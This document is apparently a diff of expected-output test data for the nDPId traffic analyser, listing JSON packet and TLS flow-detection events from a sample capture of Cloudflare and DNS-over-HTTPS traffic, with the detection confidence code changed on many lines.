00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 